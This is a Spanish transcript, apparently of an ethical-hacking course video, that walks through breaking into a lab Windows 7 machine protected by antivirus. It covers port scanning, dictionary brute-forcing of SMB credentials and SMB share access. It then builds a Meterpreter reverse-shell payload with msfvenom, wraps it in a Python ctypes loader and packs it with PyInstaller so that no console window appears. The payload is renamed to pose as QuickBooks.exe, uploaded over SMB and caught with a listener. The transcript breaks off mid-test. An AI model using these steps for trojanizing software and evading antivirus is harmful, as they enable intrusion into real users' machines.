Explotación de Windows 7 con evasión de antivirus. Bien, ¿qué vamos a ver en este taller? Vamos a ver cómo podemos lograr introducirnos o penetrar en una máquina Windows 7 que tiene un antivirus activado, que tiene todas las actualizaciones, que tiene un firewall por defecto que es el de Windows y que a la vez tiene un firewall o una configuración de cortafuegos que trae el motor antivirus. Entonces, primero que todo, vamos a ver qué herramientas vamos a utilizar durante este taller, durante este laboratorio. Entonces, vamos a tener Nmap, antes que nada, para hacer escaneos de puertos. Luego vamos a tener acccheck.pl, que nos va a permitir lograr obtener credenciales dentro de la máquina Windows 7. Vamos a utilizar Metasploit, RPC Client y SMB Client para intentar conectarnos a Samba. Luego WinExe es una utilidad que nos debería dejar conectar a Windows con credenciales que ya hayamos obtenido y ejecutar comandos o obtener una shell de sistema. MSFB NumPython y PyInstaller para generar un payload ejecutable indetectable por los antivirus. Y eso es todo, así que vamos a tener una arquitectura o un escenario de ataque. La primera es una máquina víctima Windows 7 con un antivirus actualizado, recién instalado, con un firewall funcionando. Vamos a tener una máquina atacante con Kali Linux desde la que vamos a realizar todos nuestros ataques. Y vamos a tener un laboratorio del atacante Windows 7 que lo vamos a controlar nosotros para ir probando el payload y que realmente no es detectable por el antivirus y ese tipo de cosas. Entonces, vamos a empezar por conocer la máquina virtual Windows 7 de nuestra víctima. Se llama gerencia laboratorio. Se supone que es la máquina de un gerente o de una persona de una organización. Es un Windows 7 conectado a una red Wi-Fi. Tiene compartido una carpeta que va a ser nuestro factor de ataque. Por ejemplo, un gerente en una organización va a querer compartir alguna carpeta tal vez con sus asistentes, con alguno de los empleados, y eso es lo que estamos haciendo aquí. Estamos compartiendo dentro de documentos una carpeta llamada nómina que tiene un archivo nómina mes de febrero.txt. Entonces, ese va a ser nuestro factor de ataque. Y algo que quiero aclarar antes de nada es que no hay alguna forma de simplemente penetrar en Windows 7 poniendo la IP del puerto y dándole exploit. No. Probablemente haya una forma similar con exploits privativos de $10,000, $15,000 o $20 o en suites de ciberespionaje de gobiernos como Estados Unidos de Norteamérica, como malware bastante avanzado como Stuxnet, pero públicas y disponibles para nosotros no hay ese tipo de cosas. Así que nosotros vamos a tener que hacer un proceso un poco más largo, más interesante, tal vez más divertido, porque vamos a ir resolviendo retos a medida del penetration testing, pero vamos al fin a poder lograr vulnerar la máquina Windows 7 objetivo con todas las protecciones activadas. Entonces vamos a empezar por hacer un escaneo de puertos, nmap-ss, -sb, -o para detectar el sistema operativo, sb para detectar las versiones de los servicios y ss para que sea un escaneo de tipo SINT a la IP objetivo, que es nuestra máquina Windows 7 192.168.100.186. Entonces lo importante va a ser que vamos a detectar dentro de esa máquina, puesto que está compartiendo una carpeta, el servicio NetBIOS activado, que nos permite pues compartir archivos y carpetas dentro de nuestra propia red. Entonces, vamos a esperar que se ejecute el escaneo de Nmap y vamos a comprobarlo. Y efectivamente hay un puerto abierto 445 para NetBIOS y otro 139 para NetBIOS y 135 para RPC. Esto es un Microsoft Windows 7 Professional y ya hemos detectado que está el puerto 445 abierto, por lo que podemos inferir que efectivamente hay carpetas compartidas o hay algún tipo de recurso compartido. Entonces, ¿qué es lo que vamos a hacer antes que nada? Vamos a traer por aquí la máquina virtual que está aquí. Vamos a ponerla por acá. Aquí tengo una pantalla extendida, entonces me van a ir viendo mucho hacia allá. Y vamos a crear
un diccionario de contraseñas que nos va a permitir atacar a la máquina Windows 7. ¿Cómo podemos construir un diccionario de contraseñas? Sencillo. Gracias a todos los pasos anteriores que ustedes realizaron en Information Gathering, van a poder pues tener la información necesaria para tal vez encontrar algún patrón o para tal vez generar contraseñas contra esos posibles usuarios. Algo interesante de Nmat, de la salida que nos dio Nmat hace un momento, es que aquí podemos ver Nmat Scan Report for Laboratorio PC. Laboratorio PC es el nombre del equipo al que acabamos de escanear en esta IP, y la mayoría de veces Laboratorio PC se compone de dos partes. Solo la parte laboratorio, que vendría a ser el usuario de esa máquina, guión PC, puesto que este nombre lo genera automáticamente Windows cuando estamos en su instalación. Nos agarra el nombre de usuario y genera este nombre para el equipo. Entonces sabemos que el usuario podría ser laboratorio. Así que lo que vamos a hacer es un ataque de contraseñas. Obviamente el ataque de contraseñas es una de las cosas más efectivas, puesto que logramos tener credenciales y comportarnos como un usuario legítimo dentro de una máquina. Eso es muy bueno, y es importante que ustedes entiendan que los ataques a contraseñas durante los penetration testing van a ser fundamentales. Si ustedes logran capturar contraseñas o logran encontrar la contraseña de un equipo, prácticamente se puede decir que ya lograron explotar una vulnerabilidad bastante grave y que ya podemos empezar a hacer cosas como las que vamos a hacer aquí. Entonces, para generar ese diccionario hay múltiples formas. Podemos descargarnos un diccionario de palabras en español. Entonces vamos a ir a Packet, Storm Security, Wordlist, Crackers, Wordlist, y a la página 3, y allí vamos a encontrar un paquete para español. 172.122 palabras en español, lo vamos a descargar. Y a la vez, con estas palabras que podrían llegar a ser contraseñas, vamos a poner dentro del mismo archivo las contraseñas que nosotros creamos que podrían llegar a funcionar gracias a toda la recolección de información que hicimos. Detectamos que la persona se llama Juan Sebastián el Hash, entonces vamos a intentar construir contraseñas con su nombre. Detectamos que tiene un hijo que se llama Juan Andrés, entonces vamos a generar contraseñas con Juan Andrés más el nombre de nacimiento del hijo y ese tipo de cosas. Son vainas que realmente suelen funcionar, que podemos aplicar y que suelen dar resultados efectivos. Realmente son efectivos. Entonces, aquí vamos a abrir Spanish y vemos que hay un montón de palabras. Vamos a agregar las nuestras por ahí. Entonces, por ejemplo, Juan el Hash, Juan 2014, gerente 2015, división informática, Sofía 29, el número de teléfono de no sé quién, la cédula del usuario, gerencia, administración. Todas las dependencias posibles en una empresa, por ejemplo, también podrían ser funcionales. Nóminas, Juan 2014, gerencia 2014. Obviamente aquí en este diccionario yo estoy incluyendo la contraseña que ya configuré al instalar mi máquina virtual de pruebas, por supuesto, pero sin duda que ustedes tienen que ser capaces de construir un diccionario de contraseñas efectivo para poder lograr tener este tipo de accesos. Es fundamental, es de carácter importantísimo que lo hagan durante un penetration testing. Entonces ya tenemos un diccionario. Vamos a utilizar una herramienta llamada acccheck.pl que nos va a permitir, por ejemplo, intentarnos conectar como administrador con contraseña en blanco, intentar conectarnos con un diccionario de passwords al usuario administrador, con un diccionario de passwords y un diccionario de usuarios, o por ejemplo, lo que vamos a hacer nosotros va a ser -t, el host objetivo 168.100.186 con el usuario que encontramos gracias a Nmat, que vendría a ser laboratorio, con las contraseñas que tenemos en Spanish. Lanzamos el ataque y al parecer no nos ha dado ningún resultado. A ver, Spanish. Esto debería tardarse un buen rato. acccheck.pl -t 192, 168, 100, 186
que es la IP que tengo en esta máquina, efectivamente, -u, laboratorio, -p mayúscula, Spanish, para decirle que es un archivo. Y aquí va a intentar entonces encontrar las credenciales. Una vez que tengamos las credenciales, todo va a ser más fácil. Por ejemplo, vamos a poder utilizar un módulo de Metasploit llamado PSSEC, que nos va a permitir utilizar esas credenciales, cierta información de el compartimiento de archivos o el compartimiento de carpetas que tiene configurada la máquina y obtener una sesión Meterpreter. Se supone que eso debería llegar a pasar con Metasploit y con PSSEC. Entonces, aquí logramos encontrar una contraseña efectiva para el usuario laboratorio. Entonces, primero comprobamos que el laboratorio existe y que sí es un usuario real. Y segundo, logramos encontrar su contraseña. Creería yo que en un penetration testing, las dos mejores formas de lograr acceso a un equipo, a una máquina, obviamente aparte de explotar un servicio, que son cosas que por lo general ya no se dan porque la mayoría de servicios están parchados, serían ataques de fuerza bruta que suelen ser altamente efectivos, puesto que las contraseñas y las políticas de contraseñas no son muy buenas en empresas que no tienen políticas de seguridad claras. Por ejemplo, una empresa dedicada a la producción de materiales de construcción, por ejemplo, no va a tener una política de contraseñas tan buena como la podría tener una casa de desarrollo de software. Entonces, varía mucho. En el pen testing de la vida real nos vamos a encontrar con un montón de contraseñas muy débiles, incluso sus contraseñas podrían ser débiles, y es una realidad que los ataques de fuerza bruta son altamente efectivos. Y la segunda opción podría ser a través de ingeniería social y de archivos maliciosos, de lograr camuflar un archivo de tal forma que podamos engañar a un usuario para que lo descargue y lo ejecute. Por ejemplo, generar un payload ejecutable, cambiarle el icono, cambiarle el nombre del producto, la descripción, la versión, que los antivirus lo vean como un programa real, como un programa no malicioso, que a la vez tenga técnicas para evadir antivirus y que lo enviemos con un correo por alguna forma a algún usuario y que logre ejecutarlo. Es una técnica sin duda también muy efectiva, que prácticamente nos está dando un acceso por culpa del usuario. Es decir, estamos explotando la vulnerabilidad más grave, la vulnerabilidad del usuario, y al usuario ejecutar ese tipo de cosas simplemente nos está diciendo: tome, entra a nuestra máquina. Entonces, es importante que ustedes entiendan que estas técnicas son bastante funcionales y que simplemente agarrar una IP, un puerto y dar exploit no va a funcionar la mayoría de veces, porque esto es pentesting real y pentesting profesional. Entonces, vamos a buscar PSSEC, que es un módulo de Metasploit que, como les decía, nos va a permitir usar las credenciales que acabamos de obtener para conectarnos y subir una Meterpreter payload, un Meterpreter payload. Entonces vamos a ver las opciones: set rhost 192.168.100.186, set smvpass, que fue la contraseña que recién encontramos, que es gerencia 2014, set smvuser, que es laboratorio. Y algo importante aquí es el share. El share por defecto es admin y el guión peso. IPC o C viene por defecto cuando uno empieza a compartir carpetas o recursos en Windows, pero probablemente nosotros no vayamos a poder lograr una conexión exitosa conectándonos a alguno de esos shares, puesto que si vienen por defecto puede que no estén configurados o puede que no tengan permisos, ese tipo de cosas. Y otra cosa importante es el domain. ¿En qué domain se está ejecutando o en qué domain está nuestro usuario, el usuario que acabamos de encontrar? Podríamos intentar con esto. Vamos a configurar un payload también para ver qué pasa. Windows Meterpreter a ver, autocompletado, sí. Reverse TCP. Vamos a configurar un localhost 192.168.100.128, que es nuestra IP, un local port que va a ser 443. ¿Por qué 443? Resulta que nuestra víctima tiene un firewall y ese firewall podría bloquear conexiones salientes a puertos extraños como 4, 5, 8, 9,
Mientras que si nosotros ponemos que vamos a escuchar por el puerto 443, es el puerto por defecto de SSL y es altamente probable que el firewall no vaya a bloquear conexiones salientes para SSL. Así que vamos a verificar otra vez las opciones, vamos a ver que todo esté correcto y vamos a darle exploit. Y vamos a tener un problema. No vamos a lograr entrar, nos va a decir status access denied a pesar de que tenemos credenciales válidas. ¿Por qué podría darse esto? ¿Por el share o por el SMB domain? Cambiemos el share, por ejemplo. Ahora pongamos set share IPC. Ejecutemos nuevamente el exploit. Y ahora nos dice status object path syntax path. Aquí logró autenticarse al parecer, pero no logró ejecutar el payload. ¿Por qué? Puede que no tengamos los suficientes privilegios, puede que PCSec intente subir un servicio a la máquina remota y el antivirus lo bloquee, o Windows lo bloquee, o algo por el estilo puede estar pasando. Entonces, podríamos incluso ahora intentar encontrar otro domain. ¿Cómo vamos a encontrar el domain? Aquí podemos utilizar una herramienta llamada RPC Client que nos va a permitir recolectar información autenticándonos dentro de una máquina. Es algo que ustedes vieron en la primera clase del curso de Hacking Ético Profesional, así que ya deberían saber cómo funciona. Entonces con -U vamos a especificar el user y luego vamos a poner la URL objetivo 186, la contraseña que obtuvimos que fue gerencia 2014 y vamos a hacer un help para ver los comandos y nos interesa ver todo lo relacionado a dominio. Entonces aquí por ejemplo enumerate domains. Entonces hay dos, laboratorio PC y built-in. Si yo voy query .info, me va a consultar la información del dominio actual y tengo que el dominio se llama laboratorio PC, que no está trabajando con Workgroup, que el usuario que nosotros obtuvimos está bajo el dominio laboratorio PC, que pues es prácticamente el nombre de la máquina. Entonces vamos a configurar ese domain a ver qué pasa. Set smb domain laboratorio PC, conservándolo todo en mayúsculas por sintaxis. Damos exploit y otra vez no logramos acceder. Entonces, ¿qué pensaría cualquier persona aquí? Que tuvimos unas credenciales pero que no estamos pudiendo acceder, así que vamos a dejar el pentesting aquí. Pero no, hay muchísimo más aún por hacer. Tener las credenciales de una máquina probablemente puede impresionar a algún cliente, pero tener las credenciales de una máquina, acceder a esa máquina, ejecutar algún archivo malicioso que nos devuelva una shell, empezar a subir privilegios, poner un keylogger y capturar todas las contraseñas que se digiten en esa máquina, empezar a pivotear a otras máquinas dentro de esa red, snifear tráfico, comprometer múltiples máquinas dentro de la red, sorprende muchísimo más a un cliente y lo deja muchísimo más contento a tener simplemente la credencial de una máquina. Entonces es importante que sea como sea intentemos penetrar este Windows 7, así que vamos a empezar a pensar. Esto es la recreación de un caso real que tuve en un pentesting real, así que simplemente les estoy mostrando a qué podrían llegar ustedes a enfrentarse y cómo tratar con ello, ¿no? Es más cuestión de pensar y de ponerse el reto de realmente entrar a esa máquina. Entonces, si no se pudo por Metasploit, se va a poder por algún otro lado, así que vamos a seguir. Así que lo que vamos a hacer, o por lo menos lo que yo consideré correcto hacer cuando me encontré con este caso, fue verificar qué era lo que estaba sucediendo con Metasploit y por qué hace ese check si lograba una conexión satisfactoria. ¿Por qué con PSSec de Metasploit no? ¿Por qué hace ese check sí? Bueno, puede ser en Metasploit porque PSSec intenta ejecutar directamente algún servicio o algo por el estilo. Tendríamos que entrar al código para ver realmente qué es lo que está haciendo. Yo decidí entrar al código de acccheck, que realmente está no aquí, sino que tenemos que ir a su ubicación en userbint, acccheck.pl, y verificar cómo era que estaba logrando conectar a la máquina Windows 7. Así que por aquí va a haber una función que se llama smb-connect. Esa es la función que nos interesa ver. Clean up smb-connect. Entonces, aquí lo que hace es el ataque de fuerza bruta. Agarra una IP, hace un for a los usuarios, hace un for a las contraseñas e intenta conectarse. Entonces, por aquí hay un if y aquí está imprimiendo
success connected to la IP con el username no sé qué y con la password no sé qué, que fue el mensaje que nosotros recibimos cuando la conexión, cuando el ataque fue satisfactorio. Así que esto realmente está evaluando un connect value igual a 0, y connect value es una variable a la que se le asigna el valor que retorna la ejecución de esta función. Esta función en Perl System lo que hace es ejecutar un comando en el sistema. El comando que está ejecutando en el sistema es smb client con una IP, con un share, que es uno de los por defecto que trae Windows cuando uno empieza a compartir, como les decía, admin, IPC y C. En este caso se conecta a IPC con un -u, que es el user que le pasamos, y una pass, que es la contraseña que le pasamos. Así que está utilizando SMB Client. Así que vamos a utilizar entonces a MSB Client. Vamos a ver cómo funciona. Cuando yo me encontré con esto, pues por supuesto fui a la documentación de SMB Client y vi cómo funcionaban los comandos, y hay varios comandos útiles. El primero va a ser -l. Vamos a intentar conectarnos a 192.168.100.186. Si nos pide contraseña, la dejamos en blanco y nos dice Anonymous Login Successful, pero no nos enumera nada. Nos dice que este es acceso denegado, que obviamente no podemos ver porque estamos logueados, pero nos dice que estamos entrando al dominio workgroup. Entonces ya sabemos que está el dominio workgroup realmente, que es el default, y laboratorio PC, que es en el dominio en el que está nuestro usuario al que le vulneramos la contraseña. Entonces, Windows 7 Starter, nos estamos logrando conectar. Ahora deberíamos conectarnos con SMB Client a la IP / 192.168.100.186 por el share que tiene por defecto, que vendría a ser IPC, y con un usuario -u, que sería laboratorio, que fue al que le encontramos la contraseña. Nos la va a solicitar nuevamente. Vamos a poner la contraseña gerencia 2014 y estamos dentro de un cliente SMB. Samba Client significa esto, que realmente lo que hace es conectarse a NetBIOS, que es el paralelo de Samba, pero en Windows. Samba para Linux, NetBIOS para Windows, Samba para Linux, NetBIOS para Windows. Y logramos aquí entrar a SMB Client. Entonces, ¿qué podemos hacer con SMB Client? Pues vamos a poner un signo de interrogación para ver los comandos disponibles. Entonces, ¿qué comandos hay? Está el comando pwd, que nos muestra dónde estamos. Está el comando dir. A ver esto por acá. Está el comando dir, pero nos está diciendo, hey, NT status access Daniel listing. Usted no puede listar las contraseñas. No puede listar los archivos, perdón. Entonces, ¿qué vamos a hacer? Resulta que IPC no nos está dando los suficientes privilegios, así que vamos a salirnos, vamos a conectarnos nuevamente, pero con el comando -l. Vamos a especificar un usuario que va a ser laboratorio. Nos va a pedir la password, que es gerencia 2014, y ahora sí nos va a permitir listar todos los shares, puesto que somos un usuario autenticado, porque tenemos privilegios en el sistema, por lo menos para ver esto. Y aquí está la que nos interesa. Aparte de las por defecto, hay una carpeta llamada users que tiene recursos compartidos, así que nos interesa conectarnos por ese share. Entonces vamos a ejecutar nuevamente el comando smb client, la IP, pero esta vez no a IPC, sino vamos a conectarnos a users con -u laboratorio, la contraseña, como siempre, y vamos a intentar otra vez el pwd. Funciona el dir, y ahora sí funciona dir, y esto es algo importante. Ahora podemos navegar entre directorios, seguir haciendo dir, por ejemplo, entrar a los documentos de la máquina, y ahí es donde está la carpeta compartida. Entonces, efectivamente, estamos dentro de la máquina, estamos navegando por sus directorios, pero aquí hay un problema. Nos logramos conectar por SMB Client y acceder a la máquina, no por Metasploit. Si nos hubiéramos logrado conectar por Metasploit, directamente tendría una shell Meterpreter. Pero como nos conectamos por SMB Client, el problema de SMB Client es que es simplemente para transferencia de archivos. Es un protocolo que nos sirve para modificar o acceder a archivos dentro de nuestra red local compartidos, modificarlos, leerlos, etcétera, etcétera. Pero no podemos ejecutarlos.
Así que si nosotros hubiéramos un payload ejecutable, un payload malicioso que nos devolviera una Meterpreter shell, no podríamos ejecutarlo a través de SMB. Entonces, ¿qué es lo que vamos a hacer? Podemos hacer un ataque bastante interesante, que sería el siguiente: detectar el software que tiene instalado la máquina Windows 7, y algún tipo de ejecutable que sabemos que el usuario va a estar corriendo constantemente. Por ejemplo, si estamos dentro de la máquina del gerente, pues va a haber algún tipo de software para control de ventas, algún tipo de software para control de nómina, algún tipo de software para control como tal de la empresa, y vamos a intentar hacer algo. Vamos a descargarnos el ejecutable de ese software a nuestra máquina, luego lo vamos a borrar de la máquina víctima, de la máquina comprometida. Vamos a generar nosotros ese mismo ejecutable, pero esta vez malicioso. Vamos a hacerlo totalmente indetectable a los antivirus y al firewall, a subirlo otra vez, puesto que SMB Client nos permite tanto bajar como subir. Y cuando el usuario vuelva a intentar ejecutar ese software, se va a devolver una conexión reversa a nosotros, a nuestra máquina atacante, que vamos a estar escuchando. Este es un ataque que, por supuesto, a mi parecer puede funcionar bastante bien, puesto que las personas están constantemente ejecutando software dentro de sus máquinas, por supuesto. Pero si a ustedes se les ocurre otra forma de lograr subir archivos y que sean ejecutados remotamente, pues perfecto. Pero esta técnica es bastante interesante, creo que podrá funcionar. Con WinExe, si hubiéramos tenido los privilegios suficientes, nos habríamos podido conectar a través del laboratorio a 192.168.100.186 llamando a CMD, pero como vemos, pues no nos está dejando tampoco conectar, así que simplemente esta es la última opción: subir un archivo y encontrar la forma más inteligente de que se ejecute. Y qué mejor forma de que el usuario mismo, de forma transparente, sin notarlo, ejecute realmente un payload malicioso que nos va a permitir acceder a su máquina. Entonces vamos a empezar con eso. Entonces lo primero que vamos a hacer para generar ese payload es utilizar MSFB Enum. Es una herramienta del framework Metasploit que nos va a permitir generar payloads y a la vez encodearlos con pues algún tipo de encoder, por ejemplo Chicata Ganai, que es el más efectivo, y imprimirlo en cualquier formato. En este caso vamos a querer imprimirlo en formato Python para después nosotros agarrar esas shellcode, meterla dentro de un programa propio y hacerlo indetectable al antivirus. Entonces vamos a ejecutar msfb-enum para ver las opciones. Entonces la primera opción sería "-p", en donde vamos a configurar el payload que vamos a generar, que sería Windows Meterpreter Reverse TCP. Luego viene el encoder, que sería un nombre como Chicata Ganai. Entonces, para listar los encoders que hay, vamos a utilizar la opción "-l" y la palabra encoders. msfb-enum "-l encoders". Vamos a ver cuáles están disponibles. Y según esto, el excellent de nivel excellent es Chicata Ganai. Entonces vamos a utilizar ese. "-c", Chicata Ganai. Con "-i" vamos a especificar la cantidad de iteraciones que queremos que haga MSFB-enum con el encoder sobre el payload. Esto no va a ser muy funcional realmente, porque al fin y al cabo esto no va a lograr evadir el antivirus de Windows 7. Así que simplemente vamos a decirle, por ejemplo, 15. Vamos a especificarle el localhost al que debe conectarse la shellcode o el payload cuando se ejecute en la máquina remota. Entonces el localhost, por supuesto, va a ser a nosotros, 192.168.100.128, con un L-port, como lo veíamos ahorita, por el 443 para que el firewall probablemente no lo bloquee, y en formato Python. Entonces esto va a generar el payload Windows Meterpreter Reverse TCP encodado 15 veces con Chicata Ganai en formato Python, que realmente va a ser una shellcode que nosotros vamos a utilizar dentro del script propio que creemos. Listo, aquí tenemos el shellcode. Esta es la parte de Python. Vemos que es como la declaración sencilla de una variable, y aquí vemos que lo iteró 15 veces. Entonces vamos a copiar esto. Vamos a crear un script aquí que se va a llamar
shellcode, por ejemplo, shellcode.py. ¿Y qué vamos a hacer? Vamos a tomar este shellcode que está en formato Python, vamos a, dentro de nuestro programa, llamar a C. Resulta que nosotros desde Python podemos ejecutar código C, así que esta shellcode lo que vamos a hacer es convertirla en una string y ejecutarla desde C, como si fuera código C, pero dentro de nuestro script Python. Entonces, ¿cómo va a funcionar esto? From ctypes, que es la librería para C, importamos todo, aunque realmente solo vamos a utilizar dos funciones, y aquí vamos a crear nuestro buffer que nos imprimió msfvenom, shellcode. Vamos a crear una variable memory que va a contener el resultado de la ejecución de la función createStringBuffer. createStringBuffer, que lo que va a hacer es recibir above y al len de above. Esto lo que va a hacer es crear algo así como un char dentro de C con el contenido y pues por supuesto con el tamaño. En C tenemos que especificar el tamaño que va a tener un char. Entonces con len_above le especificamos el tamaño. Ahora vamos a tener una variable llamada shell que va a ser cast, que va a recibir la memory, el tipo de datos char que contiene todo ese buffer, y vamos a ejecutar una función de C que va a ser de tipo void. C void. Y listo, al final simplemente llamamos a la ejecución de todo este shellcode, que realmente lo que hace es devolvernos una conexión reversa a nosotros desde la máquina víctima. Entonces guardamos esto, shellcode.py, vamos a subirlo por ejemplo a SendSpace para hacer algo más interesante. Resulta que nosotros no podemos subir este archivo .py a la máquina Windows 7 que hemos vulnerado, puesto que esa máquina no tiene Python instalado. Simplemente una persona que trabaja en una empresa común y corriente no va a tener Python instalado, a menos que pues, tenga como hobby programar. Pero, ¿qué vamos a tener que hacer? Si probablemente ejecutáramos este archivo .py en la máquina Windows 7, en este momento no lo detectaría el antivirus. Sin embargo, no nos sirve que esté en .py, así que vamos a convertirlo a .exe. Y aquí es donde entra la máquina laboratorio nuestra del atacante que les comenté al principio. Ahí es donde vamos a probar que realmente el .py se esté convirtiendo en un ejecutable. Podríamos ejecutarlo ahí y ver si el antivirus lo detecta o no, y ver que realmente está funcionando antes de subirlo ya a la máquina que queremos realmente vulnerar. Entonces vamos a abrir nuestro laboratorio Windows 7, vamos a iniciarlo, es este atacante Windows, y ahí tenemos instalado una herramienta, tenemos instalada una herramienta que se llama PyInstaller y una utilidad que se llama PyWin32. Entonces PyInstaller lo que hace es recibir un archivo .py, convertirlo a .exe, y eso es todo. Y ahora sí vamos a poder subirlo por SMB a la máquina que queremos comprometer y poder ejecutarlo, o pues poder hacer que posteriormente el usuario de esa máquina lo ejecute pensando o creyendo que es realmente el software legítimo que usa probablemente a diario. Entonces vamos a utilizar PyInstaller. Entonces, ¿qué tenemos aquí? PyInstaller. PyInstaller ustedes lo pueden encontrar en Google muy fácilmente. Simplemente entran a su página y descargan la versión. Y van a necesitar también PyWin32. PyWin32 es una utilidad para Python y para específicamente Windows. La van a encontrar también en Google, en sourceforge.net, y se van a descargar la versión exacta para su versión de Python. En este caso para mí es la 2.7. ¿Sí? Entonces, eso es todo. Al descargarnos PyInstaller vamos a tener una carpeta que contiene una cantidad significativa de scripts, y aquí está el más importante, PyInstaller. Ese es el script que vamos a tener que ejecutar. Entonces vamos a descargar el payload de shellcode que generamos en Kali aquí a nuestro laboratorio de atacante, para convertirlo entonces a ejecutable. Entonces sendspace.com, vamos a ver el link. Sendspace.com/file
2JU5XC. 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 Sainspace.com/file/2JU5XC. Entonces aquí está nuestro shellcode.py. Simplemente lo vamos a descargar. Shellcode. Entonces, vamos esto, lo guardamos en el escritorio, puede ser, o incluso podríamos guardarlo una vez aquí en PyInstaller para que sea más fácil después al ejecutar el script PyInstaller no tener que pasar una ruta larga, sino que simplemente digamos el nombre del archivo. Listo, entonces ya descargada nuestra shellcode, vamos a convertirla a .exe. Entonces vamos a ir a desktop, PyInstaller, hacemos un dir, vamos a la carpeta, otra vez dir, y aquí tenemos a nuestro shellcode. Y también tenemos a pyinstaller.py. Entonces vamos a convertirlo a ejecutable. Python pyinstaller.py con dos opciones fundamentales. La primera, --one file, para que solo me genere un archivo ejecutable con todo lo necesario, y --windowed en pasado, para que al momento de que el usuario ejecute nuestro payload no salga una ventana emergente, una consola CMD emergente, sino que la ofusque, no la deje ver y simplemente el usuario no vea absolutamente nada y piense que nada pasó. Entonces, windowed, y ahora especificamos nuestro shellcode. Ejecutamos. Y esto nos va a generar una carpeta con el mismo nombre de nuestro archivo. Entonces la carpeta va a llamarse shellcode, que va a contener build y que va a contener a dist. Vamos a esperar que se ejecute PyInstaller. Bien, entonces una vez finaliza la instalación, vamos a hacer un dir, o la instalación no, la ejecución de PyInstaller. Vamos a ver que hay una nueva carpeta llamada shellcode, igual que nuestro script. Vamos a ir a esa carpeta, cd shellcode, hacemos un dir, les decía, hay una carpeta nueva build y dist. Entonces también hay algo muy importante que es shellcode.spec. Entonces vamos a tener que ejecutar nuevamente PyInstaller y pasarle ese archivo. Python pyinstaller.py, la ruta a shellcode.spec, entonces es la carpeta shellcode /shellcode.spec. Listo, ejecutamos nuevamente y eso lo que va a hacer es ya generarnos un payload con todo lo necesario, con las especificaciones que le hayamos decidido poner. En este caso nosotros no le pusimos especificaciones, pero ya en un ataque real sería importante que, por ejemplo, ustedes en especificaciones pongan el icono de la aplicación que están sustituyendo, que están reemplazando, el nombre del producto, la descripción igual, la versión exacta, para que sea más normal, para que sea más creíble al usuario, para que no cambie, por ejemplo, el nombre, el icono y el usuario levante alguna sospecha. Entonces vamos a ir nuevamente a shellcode, vamos a hacer un dir, vamos a ir a dist y aquí vamos a tener un ejecutable, un .exe solo. Entonces eso lo vamos a subir a Senspace otra vez para descargarlo en nuestra máquina Kali Linux atacante y subirlo por medio de SMB a la máquina que tenemos vulnerada. Entonces, PyInstaller, shellcode, dist y el ejecutable. Entonces vamos aquí, Kali, será Senspace, file y el nombre del archivo. Bueno, esto probablemente tarde partiendo de nuestra conexión, nuestra velocidad de subida, pero el script es bastante pequeño, tan solo son 355 megas. El ejecutable generado, no el script, esto ya es el ejecutable como tal.
Entonces ya podemos descargar nuestro archivo en nuestra máquina Kali. Entonces file 55stqe, file 55stqe, 55stqe, 55stqe. Y ahí está, shellcode.exe. Descargamos, guardamos. Y nos vamos a conectar entonces otra vez por SMB Client. Sin embargo, vamos a esperar que descargue shellcode para cambiarle el nombre a algo que realmente podamos reemplazar. Entonces, para nuestro caso, cuando estábamos conectados a SMB Client, encontramos un QuickBooks.exe. Así que vamos a ponerle a nuestro shellcode también QuickBooks.exe. Shellcode.exe, QuickBooks.exe. Tenemos un LS y ahí está. Entonces nos conectamos nuevamente por SMB Client, la clave, y vamos a poner, antes que nada, vamos a navegar hasta ese directorio. Laboratorio, dir, aquí está QuickBooks.exe. Vamos a hacerle delete, lo vamos a borrar. Lo borramos. Vamos a ver, al parecer no se pudo borrar. Entonces tenemos get QuickBooks.exe, lo descarga. Vamos a ver aquí qué quedó. Y vamos a ver. Entonces, si no podemos subir aquí el archivo del QuickBooks.exe, bueno, al parecer no podemos borrar el QuickBooks.exe porque está en ejecución. Entonces, si vamos hasta gerencia de laboratorio, que es una máquina que tengo por acá, e intento borrar QuickBooks.exe de forma manual, probablemente voy a obtener un error porque está en ejecución. Vamos a ver. Y sí, no lo estoy pudiendo borrar porque está en ejecución. Entonces, en este caso, si nosotros intentáramos borrar el software y el usuario estuviera en ese mismo instante ejecutando, no podríamos. Así que tendríamos que esperar hasta que esa ejecución se detuviera. Entonces, por ejemplo, aquí vamos a hacer un taskleaks y ver si eso se está ejecutando. Entonces, efectivamente, aquí está QuickBooks.exe, que tiene este PID. Entonces, vamos a decirle taskkill y vamos a ver la ayuda. A ver, pantalla completa. Vamos a detener la ejecución para que lo podamos borrar y subir el nuestro, el propio. Entonces, taskkill menos PID y el PID de la tarea que queremos borrar. Entonces, taskkill PID de QuickBooks.exe, que es 2948. Y no nos deja matar el proceso, entonces vamos a forzarlo con /F y listo. Entonces vamos a hacer otra vez taskleaks, a ver si queda otro QuickBooks. Aquí hay otro QuickBooks, lo mismo, con el PID 3840. Y vamos a intentar borrar nuevamente desde nuestro atacante. Entonces, vámonos a conectar y laboratorio y vamos a dar del QuickBooks.exe. Y aún no lo podemos borrar, puede que por culpa de una prueba que hice anteriormente él migre el proceso y tal vez aún esté ejecutándose. Entonces taskleaks, bueno, puede ser que el proceso se siga ejecutando porque lo migré, así que simplemente podríamos, por ejemplo, pues no borrarlo. Obviamente se puede borrar si nosotros intentamos, por ejemplo, ir a nómina, ¿sí? A documents, perdón,
luego a nómina, hacemos un dir y damos dir a este archivo. Vemos que podemos borrarlo efectivamente. Si hago un dir, entonces ya no hay nada. Podemos borrar archivos porque tenemos dichos permisos, pero pues QuickBooks no lo podemos borrar porque al parecer se sigue ejecutando en background y para matarlo completamente tendría que reiniciar la máquina. Así que vamos a agarrar shellcode.exe, cp shellcode.exe, vamos a subirlo así. Entonces hago un dir, vamos a poner put shellcode.exe y ya está arriba shellcode.exe. Si hago un dir, lo voy a tener por acá, shellcode.exe. Listo, ahora, antes de que el usuario ejecute shellcode.exe, yo tengo que estar preparado para recibir la conexión en Metasploit. Así que vamos a cargar un exploit multi handler. Le vamos a setear el payload que utilizamos cuando lo generamos con msfp en on, que fue Windows, Interpreter, Reverse TCP. Vamos a configurarle el localhost 192.168.100.128, el port 443. Corremos y cuando nuestro usuario de la máquina que tenemos comprometida vaya a ejecutar, pues en teoría QuickBooks shellcode, entonces lo ejecuta. Probablemente Avast va a intentar analizarlo. Cuando finalice el análisis va a decir no encontramos nada, todo va bien, y va a dejar ejecutar al programa. Y entonces vamos a obtener aquí en la máquina atacante nuestra shell de sistema, nuestra shell Meterpreter realmente. Y de ahí podemos pasar a una shell de sistema Windows. Entonces vamos a ver. Esto debe estar analizándose. Esa base está corriendo bien. Parece que nos desconectamos de la red. Vamos a ver qué pasó. Estamos. 